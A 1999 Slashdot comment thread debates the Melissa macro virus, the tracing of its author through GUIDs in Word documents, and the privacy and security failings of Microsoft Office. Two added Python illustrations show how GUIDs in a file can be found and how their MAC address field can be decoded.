  • In this age of information, terrorism need not be physical. With most wealth existing as information outside of physical reality, and companies founded on the shuffling of bits, an "infowar" attack against a strategic economic target could do much more damage than any reasonable number of car bombs. Why blow up the Yoyodyne building when you can instead shoot down their stock price, decimating their value and causing much more damage? Or if that's not spectacular enough, cripple their communications system.

    Which is not to say that Melissa is a political or economic terrorist attack, though the age of electronic, entirely non-physical terrorism is coming. It makes much more sense. The future of terrorism looks more like the Sense/Net raid from Neuromancer than the World Trade Center bombing.
  • It's kinda funny to see the letters AOL on anything that has to do with remotely stupid things.

    Though I'm still not sure what frightens me the most; "Virus" coders who leave the door open for prosecutors, M$ software that enables people to track down the author of some word document or thousands of alt.sex regulars who open a .doc file which they found on usenet and don't disable macros.

    Strange Times... the future sure should get funny
  • Executable documents are just plain wrong.
    No, they can be made secure and sometimes they can even be useful (especially when you use interactive documents instead of regular applications, for example in a list that checks the consistency of new entries). The problem is that it is extremely difficult to make this secure, and it looks like Microsoft is not putting much effort in making VBA programs embedded in Office documents very secure.
    Netscape is quite successful at making HTML+Java/-script quite safe. They are not perfect, as the technology is evolving much too quickly, but it is definitely a proof-of-concept.
    (The above paragraph should not leave you with the impression that using Javascript on a HTML page is a good thing - of course you should use LML and Javascript is evil).
  • I think your argument is misguided:

    This GUID only applies to macro viruses (for MS office programs) or for viruses compiled with an MS compiler. Anyone who wanted to eliminate identity traces could, without too much difficulty, hand craft virus code (either hand assemble, or something similar) to not only eliminate all traces of his/her identity, but also streamline the virus to be leaner and meaner.

    As far as I understand the Ethernet specification, although the MAC address, upon which the GUID is based, is set in the factory, it is supposedly resettable by the user with a special utility. (In other words the ID number that is being tracked can be changed.)

    So, basically, only malicious hackers who don't know what they are doing, or innocent bystanders will be tracked... also, said hacker could easily frame someone else.

    Also, I don't see your justification for assuming everyone who advocates privacy is guilty. Have you ever said anything illegal on the phone? (I doubt it... almost anything you could say on the phone is protected under the 1st amendment.) That said, would you be mad if I suggested all the phone calls you ever made were taped, and would be played before a grand jury? I know I would be livid.

    Note: I used the word "hacker" above (and not "cracker") because a "cracker" is one who cracks into other's systems. Not all malicious "hackers" are "crackers". Whether writing a virus to attack other's systems constitutes cracking, I will leave as an exercise for the reader.

    Loren Osborn

  • Visual Basic is not part of the HTML standard... what you are talking about is a virus that ONLY affects Windows users who are running MS IE.

    Good thing too. Isn't this what Darwinism is all about? Hee hee.. don't see NEARLY as many virii on Linux or MacOS (nasty exception: HK automount virus).

    Anyways, back to my point... VB is the same rotten core found in Office - HTML has nothing to do with it. The "finder" of this virus tried to whip up a media scare about HTML, and FAILED...
  • As far as I'm concerned, who cares! It's an invasion of privacy none-the-less.
  • The Microsoft security website all but explained to this virus author how he should write his virus.

    Microsoft Security Bulletin 99-002 [microsoft.com] points out the "vulnerability in Word 97 which could permit macros to run without warning the user when the user opens a document based on a template containing macros." Melissa modifies Word templates to do exactly this.

    Microsoft's webpage continues with the warning "A malicious hacker could exploit this vulnerability to cause malicious macro code to be run without warning if a user opens a Word attachment that was sent by a malicious hacker..."

    This security bulletin was posted to the Microsoft Knowledge Base on January 21, 1999.

    Buried in their website, the page lamely suggests that "all affected customers" - i.e., every one of the tens of millions of Word users! - "download the patch to protect their computers." Those customers have had over two months to do exactly that, and the tiny fraction who did are presumably at least partially immune to Melissa's spread.

    Posting to an obscure security webpage hints on what might make an effective virus - a virus for which the only fix is tens of millions of separate patch downloads - is asking for trouble. Microsoft created the problem by coding a laughably insecure macro language into their applications. And they may have turned the potential problem into a real one by calling attention to it.

    "Security through obscurity" is never desirable, but when the system is already as broken as the Microsoft macro language and when the user community doesn't give a damn about applying patches, it might have been a better alternative.

    (Credit to TBTF [tbtf.com] for the link.)

    Jamie McCarthy

  • by Scott Madin ( 5020 ) on Tuesday March 30, 1999 @09:21AM (#1956857) Homepage

    So how should we feel about this? The ZDnet article only discusses the facts of the situation, which is as it should be, though there's a slight air of "this privacy-invading software feature helped catch a bad guy so it's OK" to it.

    Is it good that the author's been traced? Yeah, I suppose so. Doesn't matter all that much really, but I dislike viruses and their authors as much as the next person. If there's good enough proof that this is the author, and some damage can be shown, then I suppose I'm all for prosecuting.

    But I care a lot less about that than about the way they caught him. It seems to me we can't just go along, and say what the ZDnet article seems, ever so slightly, to be implying: that it's all right for MS (and by extension, Intel) to build identifiers like this into their products so that anything people who use those products do is traceable, just because once it helped catch someone who was doing something illegal. That's like saying "sure, the FBI can go ahead and install a wiretap on everyone's phone--fine by me, I'm not doing anything illegal, and only people who are would have to worry about that." I don't think anyone in their right mind would agree to something like that; and it violates all the principles on which our legal system is founded: "presumed innocent until proven guilty."

    It's good that they caught the author of the virus, if that were all that this meant. But it's not. I hope they don't try to prosecute unless they obtain stronger evidence, through more valid means; and if they do prosecute, I hope they don't try to use the Office-ID-number-trace in court. If they do, we're all going to have to start worrying. And looking over our shoulders.

  • I would tend to believe that someone who is stupid enough to write in WordBasic for self-expression (and what other purpose do such viruses have), probably doesn't know enough about hex editors to falsify a GUID.

    And why care about some ID number while you are willingly sending out big chunks of arbitrary information from your computer with a Word file (which can contain your dialup password, private mail and even secring.pgp), waiting only for someone with LAOLA to investigate it.

    I have received reports from catdoc users that they were able to read future plans of their bosses, which weren't intended to be sent just now.

    Imagine the surprise of the boss when an employee begins to discuss plans with him which weren't even sent (in the boss's opinion)
  • by philg ( 8939 ) on Tuesday March 30, 1999 @11:06AM (#1956873)

    First off, well said, Mr. Madin.

    This piece clearly implies that the MSID is a powerful law enforcement tool on the Digital Frontier. (BTW, I thought the out-of-nowhere references to the FBI were a nice touch.) That idea doesn't hold water, for a number of reasons. Apparently, ZD will gratuitously reinforce their message with questionable stuff like that FBI reference, but won't do the homework necessary to refute arguments that logically arise from their implied assertion.

    If they can be refuted, I don't think they can.

    First, there's no reason this will ever trap another hacker again, malicious or not. None. Anyone smart enough to write a Word97 macro is smart enough to obtain their own MAC address, scan the file for it, and remove it.

    Is the address encrypted? The article doesn't say, which leads me to believe that it's not. Even if they do end up encrypting the thing, how hard will it be to decrypt? The only people you'll track down with this will be script kiddies killing time. Hackers knowledgeable enough to do genuine damage to a defended infrastructure are knowledgeable enough to find this ID and neutralize it.

    "But that doesn't apply to the Intel ID," I can hear the ZD sycophants opine, "the Intel ID is a hardware ID, and no hacker can erase that!"

    Fair enough. And the MAC address isn't?

    In order for this ID to be useful in tracking down the origin of a virus, it has to be propagated in a file. Any file can be searched and have its contents modified. Period. The kind of ID you have makes no difference after it's overwritten.

    So this ID will only end up in documents that are:

    1. Not malicious.
    2. Malicious, but still untraceable (i.e., email automatically generated by a user who triggered a virus). In this case the ID is, to say the least, of limited value.

    So the only people the ID can track are law-abiding citizens who don't care to remove the ID because their intentions are not malicious. Now why would you want to track them?

    The answer is left as an exercise to the reader.

    phil

  • On a tangent, I have to say that any virus that strikes only Outlook users must be seen as beneficial in the global sense.

    Only Microsoft could have taken a task as simple (by design!) as reading e-mail and evolved it into a beast that takes at least 8 MB of memory when running. Strangely enough, even Microsoft's own Outlook Express tool is far lighter and friendlier, without making you feel like you're firing up Word just to read an email.

    "Less is More" evidently isn't a design adage that is used much at Microsoft.
  • Microsoft has been warned over and over by the Windows security community (which, believe it or not, is alive and well) about security issues surrounding "active" content. But Microsoft is not one company (but then again, is any) to pay attention to any outside concerns that do not address its own needs.

    While the evolution of Office macro language to VBA may be seen as a good thing, allowing the same code to unify all Office apps and use all features in a wholesome manner, the combined effect of VBA and the "webfication" of Office brings forth security issues far beyond a Melissa.

    Think about the Melissa virus as a test and about its creator as a script kid. The next virus will not be so harmless (the documented effect of Melissa is the slashdotting of some mail servers and a few hard undeserved words being screamed in corporations' corridors) nor will its author be so reckless.

    Naturally I am assuming above that the GUID found points to the right machine. Wouldn't it be funny if it doesn't? Remember, the number points to a machine. And it can easily be faked (there is even a specific C++ function in the COM API to generate GUIDs. It works in the absence of network cards).

    As for privacy, we should pay close attention to the development of all this. This is a mediatic demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certainly use this as a showcase.
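
Several comments on this page say the embedded GUID is built from the network card's MAC address and "points to a machine". As an added illustration (not code from the thread, Microsoft, or any tool named here), the Python sketch below scans a byte blob for textual GUIDs, in ASCII or UTF-16LE, and for version-1 values decodes the node (MAC) field and the creation timestamp. How Word actually stores the value is not described on this page; the sample blob, all three GUIDs and the function names are constructed for the example.

```python
import re
import uuid
from datetime import datetime, timedelta, timezone

# Version-1 timestamps count 100 ns ticks from the Gregorian calendar reform.
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def _guid_regex(sep):
    """Match 8-4-4-4-12 hex text; `sep` follows every character (b'' or an escaped NUL)."""
    hexchar = rb"[0-9A-Fa-f]" + sep
    return re.compile((b"-" + sep).join(hexchar * n for n in (8, 4, 4, 4, 12)))


_SCANNERS = (("ascii", _guid_regex(b"")), ("utf-16-le", _guid_regex(rb"\x00")))

# Constructed sample: one GUID as UTF-16LE text, two as ASCII, separated by filler bytes.
SAMPLE_BLOB = (
    b"\x07\x00props|"
    + "6AD12000-E373-11D2-9A3C-00005E005301".encode("utf-16-le")
    + b"\x00\x00|x-id="
    + b"7b5f4c10-e373-11d2-8f21-d3a1c4e5f607"
    + b";\x02tmp="
    + b"3f2504e0-4f89-41d3-9a0c-0305e82c3301\n"
)


def find_guids(blob):
    """Return sorted (offset, encoding, guid_text) for every textual GUID in blob."""
    hits = []
    for encoding, regex in _SCANNERS:
        for m in regex.finditer(blob):
            hits.append((m.start(), encoding, m.group().decode(encoding).lower()))
    return sorted(hits)


def describe_guid(text):
    """Decode what a GUID reveals; only version 1 carries a node and a timestamp."""
    u = uuid.UUID(text)
    info = {"guid": str(u), "version": u.version, "node": None,
            "node_is_random": None, "created_utc": None}
    if u.variant == uuid.RFC_4122 and u.version == 1:
        info["node"] = ":".join(f"{(u.node >> s) & 0xFF:02x}" for s in range(40, -8, -8))
        # RFC 4122: a generator without a hardware address uses a random node
        # with the multicast bit (lowest bit of the first octet) set.
        info["node_is_random"] = bool((u.node >> 40) & 0x01)
        info["created_utc"] = GREGORIAN_EPOCH + timedelta(microseconds=u.time // 10)
    return info


if __name__ == "__main__":
    for offset, encoding, text in find_guids(SAMPLE_BLOB):
        print(offset, encoding, describe_guid(text))
```

A node value is only as trustworthy as the file it was read from: anything that can write the document can write these bytes, which is the point the commenters make about forgery.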
  • by afniv ( 10789 ) on Tuesday March 30, 1999 @09:18AM (#1956886) Homepage
    Quoting Masem:
    While I am probably being paranoid and overly sceptical, it's way too convenient that the Win98 ID bug, only uncovered recently, is suddenly going to be the life saver for solving the Melissa problem.

    The M$ GUID will not solve the Melissa virus from spreading. That will go on as long as one person has not taken the proper precautions.

    All the GUID does is help catch the criminal who created the virus (assuming the GUID is accurate and was not forged).

    Actually, the GUID creates more problems. If you want to help solve crimes in a similar manner, it would be beneficial to have wire taps and other eavesdropping devices in everyone's home. That way, if anyone in the United States mentions terrorism, they can be promptly arrested for plotting terrorist acts.

    All the GUID is is Big Bro looking over your shoulder. That's not a comfortable feeling for me.

    This latest development will certainly put privacy issues in regards to electronic forums to the forefront again.

    ~afniv
    "Man könnte froh sein, wenn die Luft so rein wäre wie das Bier"
  • by sammy baby ( 14909 ) on Tuesday March 30, 1999 @09:08AM (#1956901) Journal
    There actually is a virus that will infect HTML documents [avp.com], but it relies on a Visual Basic hack to insert itself into HTML files.

    Of course, you're only vulnerable if you're running Windows. So, it's an HTML-borne virus that makes use of a Windows security hole. Doesn't matter if you have armor plated walls if the foundation is rotten.

  • by BiGGO ( 15018 ) on Tuesday March 30, 1999 @11:16AM (#1956903) Homepage
    I have an idea.
    let's expose a major security hole in one of our products,
    to let everyone see that GUID is a good thing.
    hell, they made security holes on purpose to make GUID useful.

    They planned it all along, of course,
    they knew GUID would be exposed, so made it possible for them to say:
    "You need GUID because our products are bad and have many exploits for crackers to play with"

    it reminds me when Microsoft bragged that NT servers had failsafe modes,
    and when a server crashes,
    another server can replace it.
    If NT servers didn't crash so often nobody would care.



    ---
  • You would think that Exchange server administrators would be smart enough to at least start filtering attachments or running a virus scan on incoming traffic. I guess not, since M$ themselves were offline yesterday...

    It's interesting that other collaboration/e-mail packages such as Lotus Notes and Eudora are unaffected by these problems....

    Why are M$ products *designed* to be so blatantly insecure? I'm sure the basic principles of program security have been around for ages... what motivates M$ to deliberately ignore them?

    It's not coincidence that issues like the GUID are troubling us now... these technologies were created for specific purposes... and look how easy it was for two non-M$ people to track down the creator of the Melissa docs.

    Conspiracy theories, my ass. More than enough evidence to go on here.

  • by dillon_rinker ( 17944 ) on Tuesday March 30, 1999 @09:06AM (#1956921) Homepage
    This is the worst kind of bloat I can imagine - a fancy text editor mated to a BASIC interpreter. Granted the usefulness of an integrated development environment in your word processor, it is doubly insane to permit programs to run automatically when the document is opened. While it is possible to disable macros in Word, this is not the default. 90% of users don't use macros (unless they are infected), so why couldn't MS change just one bit in its distribution from ON to OFF and do some serious good toward slowing the spread of macro viruses?

    The really sad thing is you can't sue them. They create an obviously deficient product, one which they could easily have changed to prevent material harm to their customers, yet they are not liable. But let somebody pour coffee all over their genitals, and Ronald McDonald is paying to the tune of $n*1E6.
  • Buried in their website, the page lamely suggests that "all affected customers" - i.e., every one of the tens of millions of Word users! - "download the patch to protect their computers." Those customers have had over two months to do exactly that, and the tiny fraction who did are presumably at least partially immune to Melissa's spread.

    What's really laughable is this patch. It simply changes Word so that when you open a document with a macro, Word says "This document contains macros. Would you like to disable them?" It gives no clue what effect these macros may have. This is a fix?

    Mike
    --

  • by Anti-Sean ( 21722 ) on Tuesday March 30, 1999 @08:59AM (#1956952)
    hmmm.... The timing of these incidents seems a little too coincidental. "If it wasn't for those GUID's secretly embedded in MS Office documents, we may have never tracked down this evil perpetrator", says Joe Researcher, on his way to the bank to cash in his check from billg. "Thank goodness for GUID's!"

    or maybe i've had too much coffee this morning - my paranoia settings could need some recalibration.
  • by Kithran ( 24643 ) on Tuesday March 30, 1999 @09:09AM (#1956959)
    Having read the article I can't help wondering how hard the original virus writer would find it to change the GUID in his original file. If someone can extract the GUID from files on a website what is to stop the original author creating the original infected document and then changing its GUID to that belonging to a different instance of Office. And given the prevalence of AOL free membership CD's and the ease with which a poster to USENET can fake their address is it any wonder the original source appears to be an AOL (l)user.

    Kithran

  • Interesting opinion. I think it's pretty interesting, considering it points out how M$'s shoddy products lead to security holes. Granted, the /. community already knows this... But that's never stopped submissions from being posted before.

    Executable documents are just plain wrong.

    --

  • by Bob-K ( 29692 ) on Tuesday March 30, 1999 @09:55AM (#1956978)
    First, the existence of the GUID in Word documents was not "recently discovered." It's part of the spec, and it's been known about for a long time.

    What was discovered is that the GUID is transmitted to MS during the registration process.

    Of course, the likelihood that the macro writer registered his copy of Windows using his real name and address is probably.... zero. So it's doubtful that MS has any record of that GUID.

    Which begs the question... What is the basis for ZDNet's claim that the GUID was used to "track" the document back to its creator?

    More likely, they used the NNTP headers to get some hints about where to look, and when THAT trail led somewhere, they compared GUID's and thus established an apparent connection.

    The real issue is not the recently discovered transmission of the GUID to MS during registration, it's the existence of the GUID itself that can reveal more about information than you realize. It's not "big brother," it's just bad design. And sloppy reporting.
  • by EisPick ( 29965 ) on Tuesday March 30, 1999 @10:35AM (#1956980)
    > Virus writers and crackers need to be given some serious jail time and fines.

    Agreed. Virus writers are like people shouting fire in a crowded theatre. They probably don't intend to really hurt anyone, but they know they are "playing with fire," so to speak. So if their actions hurt others they should be held accountable.

    That said, I'd rather let the virus writer get away with it than have every Office document carry a unique ID traceable to the author. Americans are too freely giving up their privacy. Time to fight back.
  • Questionable particularly in the light of the "most widespread PC virus attack ever."

    Here at CNET the decision was suddenly made this week to unilaterally roll out Outlook to all employees (Eudora was standard until now). What could the advantage of that change possibly be? Eudora is relatively small, reliable, and featureful; Outlook is enormous and crash-prone.

    Backroom deal with Microsoft?
  • .. although the guy apparently has a history of spreading virii, there is no proof that it was him.. because of the publicity regarding the UID's, anyone smart enough to engineer this type of thing would be smart enough to be able to cover their tracks..

    The ZDNet article claims that the MAC address is 'proof', but any semi-literate coder would know that it's pretty simple to change a MAC address (software settable..)

    All they have is circumstantial evidence, so anyone who's foolish enough to say "see the UIDS are good" is going to be proven to look the fool when he's acquitted.

    If the authorities push this, I hope the guy brings a huge civil lawsuit against MS for invasion of privacy.
  • by njl_ ( 31653 ) on Tuesday March 30, 1999 @09:40AM (#1956997)
    They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. Historical Review of Pennsylvania [1759] -- njl
  • So they've traced the author of the document by the ID numbers. This information CAN be forged, you know. There is a reason we don't allow random wiretaps in the US, beyond the whole privacy issue. It's because the simple discussion of a crime or thought of a crime is not in and of itself a crime, and therefore that can't be used against someone unless such a crime is committed.

    However, if a crime IS committed, and such wiretaps were in place, any person who had recently mentioned something even remotely similar in innocent conversation while tapped would be instantly suspect, and with such a "likely prospect" prosecution would focus on that individual and neglect other leads which would be more realistic.

    However, if wiretaps are common practice, a clever criminal will find a way to bypass them, or use them to broadcast false information, and end up implicating innocents of crimes they commit. Remember, the reason that wiretaps are effective now is that on the rare event that they are used, under court order, the suspect does not expect them and in many cases won't be prepared.

    However, in the case of a court ordered wiretap, the police and/or prosecution already must have some probable cause to believe that the suspect is involved in a crime and that a wiretap would be beneficial to further evidence. Although this theory is pretty easy to get around, the police can get into serious civil trouble if too many "false alarms" are presented.

    You occasionally hear about a search/seizure that went wrong. The wrong house was raided, torn apart and nothing was found which presents evidence of a crime. The victims of this false raid have rights to legal compensation for the intrusion. This simply won't happen too often under today's guidelines.

    So if we come along and say that ID's are OK because we can trace criminals, we've gotten into the habit of invading the privacy of the innocent to weed out the guilty, even when no crime has taken place. If this can be attributed to an "illegal wiretap", then the evidence which led to the aol account and all evidence which followed up as a result of that could get thrown out of court by a clever lawyer.

    The real solution isn't really tracking down the virus writers anyway. Viruses will always be with us. There is ZERO way to eliminate them completely, or to completely prevent new ones from being developed. Besides, it is remarkably simple to prevent getting infected, even if you don't have a virus scanner. It all comes down to a matter of trust.

    Almost all of this stuff starts because some idiot, and yes, I mean IDIOT downloads a virus from some complete stranger, and is compelled to spread this virus to all his friends. This is the same fool who time and again will forward hoaxes to everyone he knows just because since it came over the internet it MUST be for real. For this problem there are two solutions. Either discover the problem trait and eliminate it from the gene pool, or determine which people you know are reliable and don't ever accept attachments from anyone else.

    Don't send Word documents in email. I get so annoyed when people send me a 4 meg Word document which has 10k worth of text in it. Do you think I'm going to waste my time reading it? I don't even have an installed copy of Word, so it's hardly important to me. Anyone who automatically assumes I will have office9? installed is not someone I wish to do business with. Forget the fact that half the time I don't even know what format the document is in, and don't think I'm going to spend any amount of time figuring it out.

    The only attachments I will ever look at are images. THAT'S IT. I consider email a method of transferring text. That's INFORMATION in a form I can easily disseminate and text is the lowest common denominator in size and has the highest compression rate. If I absolutely NEED to see some huge picture, just give me a link to it and I'll make the decision to waste the bandwidth on it.

    I have made a policy of reacting violently (in a verbal way) to anyone who sends me trash like this. I make it very clear, in no uncertain terms, that if they send me such information again I will prevent them from sending me ANYTHING again. It's amazing how able people are to distinguish between hoaxes and legitimate information once you've made it clear what you don't want. Why is it then that they send it to you in the first place?

    Ok.. Here's my list of things to avoid. If you get it, delete it.

    - ALL spam, spam of all colors, it tastes just as bad. Don't reply from a legit mail account to complain, just delete it and forget about it.

    - ANY attachments other than very small pictures. Most email readers will decode pictures and display them automatically, while it will display a link for other attachments. Don't accept Word documents, .exe files, or attachments of any form you're not familiar with (as they can be exe files in disguise).

    - Don't accept programs from ANYONE over icq or IRC. It doesn't matter WHAT it is or WHO sent it to you. Even if they're not trying to screw you over, you have no idea where they got it from or what might have infected their system previously and therefore the file they're sending you. Even if they're your best friend, you really don't know for sure. Ask them where they got the file from and download it from that source yourself. If they received it from someone else and don't know the source, then it's automatically suspect already.

    Don't let anyone use your computer for ANY reason, with the exception of the system administrator if you're in a work environment. People who bring over a floppy disk, insert it in your computer and bring up a program or any other file could be infecting your computer. We have networks these days guys, you don't need to transfer files around on floppies anymore. Also, people who use your computer for chatting can also download and run programs, no matter how much effort you put into avoiding it.

    Avoid Microsoft products. They're the greatest threat to the security of any environment. If you must use them, consider them to be insecure. Don't trust them for any tasks which must be fail-safe, and assume you'll have to reboot often and reload occasionally.

    Backup early, backup often, and keep your backups safe.

    -Restil
    restil@alignment.net

  • The GUID is not a unique identifier. It is based on the MAC address, which requires an Ethernet card. If the originating computer does not have an Ethernet card, DUPLICATE GUIDs are CREATED!!

    The ZDNet story reports that the GUID has traced back to an AOL user--however most users on AOL access the Internet via modems, and have no Ethernet card! (It surprises me that this caveat is not mentioned in the ZDNet article.) The GUID is likely identical to many other dial-up users.

    Also, since GUIDs are based on MAC address, GUIDs are tied to a specific computer (or more correctly, a specific Ethernet card)--not a specific user. This creates an interesting twist in a computer lab environment.

    And even then, MAC addresses can be faked. Or, if the GUID is stored in (I'm guessing) the Windows Registry, it's even easier to change.

    For these reasons, GUIDs are meaningless. It is a poorly designed user tracking mechanism that doesn't work. The only reason one should fear GUIDs is that they may be used as evidence which may lead to false prosecution by the ignorant.

    ---BTW, the GUID is not Microsoft application specific. GUIDs are available as part of Microsoft's API's, and are used in many non-Microsoft applications. Look around a little and you'll see.
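
What the node field of a GUID can and cannot tell an examiner, as an added example that is not part of the comment above or of any Microsoft code. It assumes the GUID follows the version-1 UUID layout of RFC 4122 (last 48 bits hold the node); the document names and GUID values are constructed.

```python
import uuid
from collections import defaultdict

# Constructed sample values, not taken from any real document.
SAMPLE_GUIDS = {
    "report.doc": "{8B4E2C10-E5A1-11D2-9C3F-00A0C9112233}",
    "memo.doc":   "{A1F0D7C2-E5A3-11D2-8001-00A0C9112233}",
    "notes.doc":  "{5D3C9E40-E5A4-11D2-B7AA-03F1D2C4B5A6}",
    "draft.doc":  "{3F2504E0-4F89-41D3-9A0C-0305E82C3301}",
}


def describe_guid(text):
    """Classify the node field of a GUID string (braces optional)."""
    u = uuid.UUID(text)
    if u.version != 1:
        # Only version-1 values carry a node field; others hold no address.
        return {"version": u.version, "node": None, "node_kind": "none"}
    first_octet = (u.node >> 40) & 0xFF
    if first_octet & 0x01:
        # RFC 4122: a generator with no IEEE 802 address uses a random
        # node and sets the multicast bit, so this is not a card address.
        kind = "random"
    elif first_octet & 0x02:
        kind = "locally-administered"  # address assigned in software
    else:
        kind = "ieee-802"  # has the form of a burned-in address
    mac = ":".join(f"{(u.node >> s) & 0xFF:02x}" for s in range(40, -1, -8))
    return {"version": 1, "node": mac, "node_kind": kind}


def group_by_node(guids):
    """Map each IEEE-802-style node to the documents whose GUID carries it."""
    groups = defaultdict(list)
    for name, text in guids.items():
        info = describe_guid(text)
        if info["node_kind"] == "ieee-802":
            groups[info["node"]].append(name)
    return {node: sorted(names) for node, names in groups.items()}


if __name__ == "__main__":
    for name, text in SAMPLE_GUIDS.items():
        print(name, describe_guid(text))
    print(group_by_node(SAMPLE_GUIDS))
```

A shared node value groups documents by the address field of the machine that generated the GUID, not by the person who wrote them.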
